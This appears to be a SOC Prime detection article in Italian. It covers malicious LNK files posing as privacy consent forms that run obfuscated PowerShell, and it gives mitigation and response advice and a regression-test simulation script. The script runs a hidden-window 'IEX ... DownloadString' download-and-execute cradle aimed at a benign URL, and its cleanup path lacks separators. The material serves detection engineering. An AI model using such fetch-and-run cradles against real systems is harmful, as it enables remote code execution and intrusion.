SOC Prime Bias: Alto

19 Jun 2026 07:26 UTC

Cosa C’era Davvero all’Interno del File di Scorciatoia Mascherato da Modulo di Consenso alla Privacy?

Author Photo
SOC Prime Team linkedin icon Segui
Cosa C’era Davvero all’Interno del File di Scorciatoia Mascherato da Modulo di Consenso alla Privacy?
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

Gli attori della minaccia stanno distribuendo file LNK dannosi mascherati da moduli di consenso sulla privacy per ingannare gli utenti facendoli aprire. Quando eseguiti, questi file di scorciatoia lanciano comandi PowerShell offuscati che recuperano ed eseguono ulteriori payload utilizzando tecniche senza file. La catena di attacco è progettata per rubare informazioni e distribuire un caricatore di backdoor che aiuta a preservare l’accesso e la persistenza.

Indagine

L’indagine ha mostrato che i file LNK incorporano codice PowerShell offuscato responsabile del download di script successivi. Questi script secondari includono un downloader che preleva payload da servizi web legittimi e un caricatore che li esegue direttamente in memoria. L’attore della minaccia abusa anche del Task Scheduler di Windows per la persistenza e utilizza documenti esca per far apparire legittima l’attività dannosa.

Mitigazione

Le organizzazioni dovrebbero imporre una verifica rigorosa delle estensioni dei file e avvertire gli utenti sui file LNK mascherati da documenti regolari. I team di sicurezza dovrebbero monitorare da vicino l’attività del Task Scheduler, i log di esecuzione di PowerShell e le connessioni di rete in uscita. Gli utenti dovrebbero anche essere addestrati a convalidare sia il mittente sia il percorso di consegna di qualsiasi file in arrivo prima di aprirlo.

Risposta

Se viene rilevata quest’attività, gli amministratori dovrebbero immediatamente esaminare le voci sospette nel Task Scheduler e la creazione di script PowerShell insoliti nelle directory accessibili agli utenti. I log di PowerShell dovrebbero essere analizzati e le connessioni esterne tracciate, specialmente quelle che coinvolgono piattaforme cloud legittime o servizi di archiviazione web. Dovrebbe poi essere eseguita un’indagine forense completa su qualsiasi script dannoso identificato e sul traffico di rete non autorizzato.

Flusso di Attacco

Esecuzione Simulazione

Prerequisito: il controllo di pre-volo Telemetria e Baseline deve essere passato.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.

  • Narrativa & Comandi di Attacco: L’avversario cerca di stabilire l’accesso iniziale e scaricare un payload di malware di secondo stadio. Per evitare il rilevamento da parte di scanner di file semplici, utilizzano un file LNK (scorciatoia). Questo file LNK è progettato per eseguire powershell.exe in una finestra nascosta. Il comando passato a PowerShell utilizza Invoke-Expression and DownloadString per ottenere uno script da un URL remoto. Questo imita attacchi “Living-off-the-Land” (LotL) del mondo reale dove binari legittimi vengono utilizzati per eseguire azioni dannose, cercando di bypassare gli antivirus tradizionali basati su firme.

  • Script di Test di Regressione:

    # 1. Definire l'URL di destinazione (utilizzando un sito benigno per il test)
    $url = "https://www.google.com"
    
    # 2. Creare la stringa payload di PowerShell dannosa
    # Questa stringa è progettata per attivare il rilevamento 'DownloadString' e 'Invoke-Expression'
    $payload = "IEX (New-Object Net.WebClient).DownloadString('$url')"
    
    # 3. Creare un contenuto di file LNK falso (Simulato)
    # In un attacco reale, questo sarebbe un file .lnk binario.
    # Qui eseguiamo il comando direttamente per garantire che il log dello ScriptBlock sia generato per la convalida.
    Write-Host "[+] Simulazione dell'esecuzione PowerShell dannosa tramite payload LNK..."
    powershell.exe -WindowStyle Hidden -Command $payload
    
    Write-Host "[+] Comando di simulazione eseguito. Controlla l'ID evento 4104."
  • Comandi di Pulizia:

    # Rimuovere eventuali artefatti se i file sono stati creati
    Remove-Item -Path "$HOMEDesktopSimulated_Malicious_LNK.lnk" -ErrorAction SilentlyContinue
    Write-Host "[+] Pulizia completata."